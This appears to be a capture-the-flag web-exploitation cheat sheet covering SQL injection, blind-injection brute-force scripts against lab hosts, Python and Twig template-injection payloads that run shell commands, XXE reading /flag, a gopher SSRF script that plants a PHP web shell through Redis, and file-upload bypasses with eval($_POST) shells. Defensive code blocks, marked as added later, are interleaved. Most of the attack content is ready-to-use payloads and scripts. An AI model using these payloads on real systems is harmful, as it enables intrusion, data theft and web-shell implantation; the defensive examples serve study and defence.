web

Common HTTP client-IP headers

x-forwarded-for
x-remote-IP
x-originating-IP
x-remote-ip
x-remote-addr
x-client-ip
x-client-IP
Client-ip
X-Real-ip
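On the defending side this list is the set of headers an application must not trust blindly, since each one is written by whoever sends the request. The example below is added here and is not part of the original notes: it contrasts a lookup that trusts the first such header with one that only honours the X-Forwarded-For entry appended by a known reverse proxy; the proxy address 10.0.0.5 and the sample requests are constructed.

```python
import ipaddress

# Constructed: the address of our own reverse proxy (assumption for this example).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Header names are assumed to be lower-cased by the framework.
SPOOFABLE = ("x-forwarded-for", "x-real-ip", "x-client-ip", "x-remote-addr")

def naive_client_ip(headers, remote_addr):
    """Returns the first spoofable header found; the client chooses the value."""
    for name in SPOOFABLE:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return remote_addr

def safe_client_ip(headers, remote_addr):
    """Trusts X-Forwarded-For only when the TCP peer is our proxy, and then
    reads it from the right, skipping hops that are themselves trusted
    proxies. Anything further left was supplied by the client and is ignored."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return remote_addr                 # direct connection: the header is noise
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                          # malformed hop: stop trusting the chain
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return remote_addr

# Constructed sample requests: (headers, TCP peer address).
DIRECT_SPOOF = ({"x-forwarded-for": "127.0.0.1"}, "203.0.113.7")
VIA_PROXY = ({"x-forwarded-for": "127.0.0.1, 198.51.100.23"}, "10.0.0.5")
```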

SQL Injection

Fuzzing wordlist

and
aNd
or
oR
oorr
select
sElect
union
unIon
union select
union/**/select
/**/

'
"
\
information_schema
^
&&
uniOn/**/select

Keyword substitution

Spaces filtered

/**/
/*1*/

If a keyword is filtered (stripped once), double-write it so that the inner copy is removed and the outer copy survives:

e.g. union  --> uniunionon
     select --> seleselectct
     from   --> frfromom

union filtered

Using /*!union*/ bypasses a filter on union

or filtered

Use
||
instead

UNION-based injection

Determine how many columns the query returns
'or 1=2 union select 1,2,3,4 #
Dump the table names (gives fl4g)
'or 1=2 union select group_concat(table_name),2,3,4 from information_schema.columns where table_schema=database()#
Dump the column names (gives skctf_flag)
'or 1=2 union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema=database()#
Query table fl4g to obtain the flag
'or 1=2 union select skctf_flag,2,3,4 from fl4g#
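Why the keyword-substitution tricks and the UNION steps above work, seen from the defender's side: a blacklist that strips keywords in a single pass leaves a valid keyword behind, and once the value is concatenated into the query a UNION pulls data from any other table, whereas a bound parameter is never interpreted as SQL. The example below is added here and is not from the original notes; it uses an in-memory SQLite database with constructed tables users and secrets.

```python
import re
import sqlite3

BLOCKED = ("union", "select", "from", "or", "and")

def naive_filter(value):
    """Blacklist in the style the notes describe: each keyword is removed in
    one pass, so 'uniunionon' collapses to 'union' after filtering."""
    for kw in BLOCKED:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value

def make_db():
    """Constructed sample data: a users table and a secrets table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.execute("CREATE TABLE secrets (flag TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("1", "alice"), ("2", "bob")])
    conn.execute("INSERT INTO secrets VALUES ('constructed-flag')")
    return conn

def vulnerable_lookup(conn, user_id):
    """Filters, then concatenates: whatever survives the filter runs as SQL."""
    sql = "SELECT name FROM users WHERE id = '%s'" % naive_filter(user_id)
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, user_id):
    """Bound parameter: the same payload is just a string that matches no id."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]

# The double-written UNION payload from the notes, adapted to the sample table.
PAYLOAD = "' uniunionon seleselectct flag frfromom secrets --"
```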

Subquery

-1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

Stacked injection

End the statement with a semicolon to execute arbitrary further SQL statements
1';show databases;#
1';show tables;#

View a table's structure

0';desc <table name>;#

Blind injection

XOR-based

ORD()  # converts a character to its ASCII code
XOR ('^') is an arithmetic operation: 1^1=0, 0^0=0, 1^0=1. It can be used for SQL injection: when both conditions have the same truth value (both true or both false) the result is false, and when they differ (one true, one false) the result is true.

import requests

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn/search.php"
flag = ''

def payload(i, j):
    # Database name
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # Table names
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1"%(i,j)
    # Column names
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())),%d,1))>%d)^1"%(i,j)
    # Read the flag
    #sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print(r.url)
    # "Click" is only in the response when the injected condition is true
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res

def exp():
    global flag
    for i in range(1, 10000):
        # Binary search over the printable ASCII range for character i
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = (low + high + 1) // 2
        if f == 127 or f == 31:
            break  # past the end of the string
        # print(f)
        flag += chr(f)
        print(flag)

exp()

Numeric

import requests

url = "http://1fb17384-cfbb-49c8-8c5f-c32784aa812b.node3.buuoj.cn/image.php?id=\\0&path=or "
flag = ''

def payload(i, j):
    # Database name
    sql = "id = if(ascii(substr(database(),%d,1))>%d,1,-1)%%23"%(i,j)
    # Table names
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,1,-1)%%23"%(i,j)
    # Column names
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,1,-1)%%23"%(i,j)
    # Read the flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,1,-1)%%23"%(i,j)

    r = requests.get(url + sql)
    # print(r.url)
    # The JPEG marker "JFIF" is only returned when the injected condition is true
    if "JFIF" in r.text:
        res = 1
    else:
        res = 0
    return res

def exp():
    global flag
    for i in range(1, 10000):
        # Binary search over the printable ASCII range for character i
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = (low + high + 1) // 2
        if f == 127 or f == 31:
            break  # past the end of the string
        # print(f)
        flag += chr(f)
        print(flag)

exp()

SSTI (template injection):

Reading: "一篇文章带你理解漏洞之 SSTI 漏洞" (an article explaining SSTI vulnerabilities)

Smarty exploitation

  • The {if} tag in Smarty can execute PHP statements; get the flag with: {if readfile('/flag')}{/if}
  • Smarty also has {literal} and {php} (the latter usable in Smarty 2)
  • {literal} makes Smarty skip parsing of the enclosed content; payload: {literal}alert('xss');{/literal} can produce XSS

Bypasses

  • Single quote filtered: use double quotes
  • Dot (.) filtered: use [] instead
  • Underscore (_) filtered: use \x5f instead
  • class, base, subclasses and the like filtered: build the string with + concatenation

Python

Usable classes

(58, <class 'warnings.WarningMessage'>, '__builtins__')
(58, <class 'warnings.WarningMessage'>, 'linechache')
(59, <class 'warnings.catch_warnings'>, '__builtins__')
(59, <class 'warnings.catch_warnings'>, 'linechache')
(60, <class '_weakrefset._IterationGuard'>, '__builtins__')
(61, <class '_weakrefset.WeakSet'>, '__builtins__')
(71, <class 'site._Printer'>, '__builtins__')
(71, <class 'site._Printer'>, 'os')
(76, <class 'site.Quitter'>, '__builtins__')
(76, <class 'site.Quitter'>, 'os')
(77, <class 'codecs.IncrementalEncoder'>, '__builtins__')
(78, <class 'codecs.IncrementalDecoder'>, '__builtins__')

Constructing the payload

{{().__class__.__bases__[0].__subclasses__()}}
--- list everything available (all subclasses of object)

{{().__class__.__base__.__subclasses__().index(warnings.catch_warnings)}}
Find the index of the class to use; this does not always work

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
Once this executes, construct the payload:
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__import__']('os').listdir('/')}}{% endif %}{% endfor %}
List the root directory

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
Read the source code

List the directory
__import__(\"os\").popen(\"ls\").read()
Read a file
__import__(\"os\").popen(\"cat flag.txt\").read()

{{()["__class__"]["__bases__"][0]["__subclasses__"]()[80]["load_module"]("os")["system"]("ls")}}
// uses <class '_frozen_importlib.BuiltinImporter'> to execute the command
{{()["__class__"]["__bases__"][0]["__subclasses__"]()[91]["get_data"](0, "app.py")}}
// uses <class '_frozen_importlib_external.FileLoader'> to read the file

The flag is stored in config and the word config is filtered; bypass it through url_for

{{url_for.__globals__}}  # lists all globals (modules)
{{url_for.__globals__['current_app'].config}}  # read config through current_app

Twig template injection

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};

PHP

Wrappers (pseudo-protocols)

Transport (data://)

?text=data://text/plain,I have a dream

Read a file

?file=php://filter/read=convert.base64-encode/resource=index.php

XXE

Read arbitrary files

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY file SYSTEM "file:///flag" >
]>
<root>
<name>&file;</name>
</root>
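The document above works because the parser honours the DTD and resolves the SYSTEM entity. The defensive counterpart, added here and not part of the original notes, parses untrusted XML with Python's expat bindings and rejects any DOCTYPE or entity declaration before an entity can be resolved; the page's payload is embedded as a constructed byte string next to a benign document.

```python
import xml.parsers.expat

class DtdRejected(ValueError):
    """Raised as soon as the document declares a DOCTYPE or an entity."""

def parse_without_dtd(document):
    """Parses untrusted XML, refusing any DTD and therefore any SYSTEM entity
    such as file:///flag. Returns (tag, text) pairs in closing order."""
    seen, stack = [], []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE not allowed: %s" % name)

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdRejected("entity declaration not allowed: %s" % name)

    def start(tag, attrs):
        stack.append([tag, ""])

    def chars(data):
        if stack:
            stack[-1][1] += data

    def end(tag):
        name, text = stack.pop()
        seen.append((name, text.strip()))

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(document, True)   # an exception raised in a handler propagates
    return seen

def is_safe(document):
    """True when the document parses without any DTD."""
    try:
        parse_without_dtd(document)
    except DtdRejected:
        return False
    return True

# The payload from the notes (constructed here as bytes) and a benign document.
XXE_SAMPLE = (b'<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE xxe [\n'
              b'<!ELEMENT name ANY >\n<!ENTITY file SYSTEM "file:///flag" >\n]>\n'
              b'<root>\n<name>&file;</name>\n</root>')
BENIGN_SAMPLE = b"<root><name>alice</name></root>"
```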

SSRF

from urllib.parse import quote

# Builds a gopher:// URL carrying RESP-encoded Redis commands to an internal
# Redis instance; target, paths and file content are the author's values.
protocol = "gopher://"
ip = "10.66.150.11"
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "shell.php"
path = "/var/www/html"
passwd = ""
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"

def redis_format(arr):
    # RESP encoding of one command: *<argc>, then $<len> and the value for each argument
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        word = x.replace("${IFS}", " ")   # ${IFS} stood in for spaces inside one argument
        cmd += CRLF + "$" + str(len(word)) + CRLF + word
    cmd += CRLF
    return cmd

if __name__ == "__main__":
    for x in cmd:
        payload += quote(redis_format(x))
    print(payload)

File upload

Change the extension

Common alternative extensions: php3, php4, phtml, pht, phpt, php5, php6

Configuration-file attack

Upload an .htaccess file

SetHandler application/x-httpd-php

File-header bypass

GIF (GIF89a): 47 49 46 38 39 61
GIF87a

MIME-type check bypass

image/gif
image/png
image/jpeg
image/svg+xml

Null-byte (00) truncation

%00 truncation: append %00 at the end of the GET parameter
00 truncation (POST): edit the request bytes and change the final byte to 00

Script-tag bypass

<script language="php">eval($_POST['laotun']);</script>

Short-tag bypass

<?=@eval($_POST['laotun']);?>
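Taken together, the tricks in this section (alternative extensions, .htaccess, a GIF89a header in front of PHP code, a spoofed MIME type, %00 truncation, short tags) describe what an upload check has to withstand. The example below is added here and is not from the original notes: it validates an upload by extension allowlist, magic bytes and a scan for code markers, ignores the client-supplied MIME type, and stores the file under a server-generated name; the sample uploads are constructed.

```python
import os
import secrets

# Allowed extensions and the leading bytes a file of that type must carry.
MAGIC = {
    "gif": (b"GIF89a", b"GIF87a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# A correct GIF89a header is not enough: reject anything that also carries
# a PHP open tag (long or short form) or a <script> tag anywhere in its body.
CODE_MARKERS = (b"<?", b"<script")

def validate_upload(filename, content_type, data):
    """Returns (accepted, reason, stored_name). content_type is deliberately
    ignored: it is client-supplied and can always be set to image/gif."""
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename", None
    base = os.path.basename(filename.replace("\\", "/"))
    if base.startswith("."):
        return False, "dotfile (e.g. .htaccess) not allowed", None
    stem, sep, ext = base.lower().rpartition(".")
    if not sep or not stem or ext not in MAGIC:
        return False, "extension not in allowlist", None
    if not data.startswith(MAGIC[ext]):
        return False, "content does not look like a %s image" % ext, None
    if any(marker in data.lower() for marker in CODE_MARKERS):
        return False, "embedded code marker", None
    # The original name never reaches the filesystem.
    return True, "ok", "%s.%s" % (secrets.token_hex(16), ext)

# Constructed sample uploads: (filename, client MIME type, content).
SHELL_PHTML = ("shell.phtml", "image/gif", b"<?php eval($_POST['x']); ?>")
HTACCESS = (".htaccess", "text/plain", b"SetHandler application/x-httpd-php")
TRUNCATED = ("shell.php%00.gif", "image/gif", b"GIF89a")
POLYGLOT = ("cat.gif", "image/gif", b"GIF89a<?=@eval($_POST['x']);?>")
REAL_GIF = ("cat.gif", "image/gif", b"GIF89a" + bytes(20))
```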